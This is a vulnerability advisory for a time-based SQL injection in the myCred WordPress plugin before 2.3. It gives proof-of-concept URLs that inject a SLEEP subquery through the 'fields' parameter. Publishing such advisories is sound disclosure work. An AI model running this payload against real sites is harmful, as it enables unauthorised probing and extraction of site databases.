WordPress Plugin Vulnerabilities
myCred < 2.3 - Subscriber+ SQL Injection
Description
The plugin does not validate or escape the fields parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated user
Proof of Concept
(any authenticated user) https://example.com/wp-admin/users.php?page=mycred_default-history&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29 (admin) https://example.com/wp-admin/admin.php?page=mycred&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-01 (about 2 years ago)
Added
2021-11-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)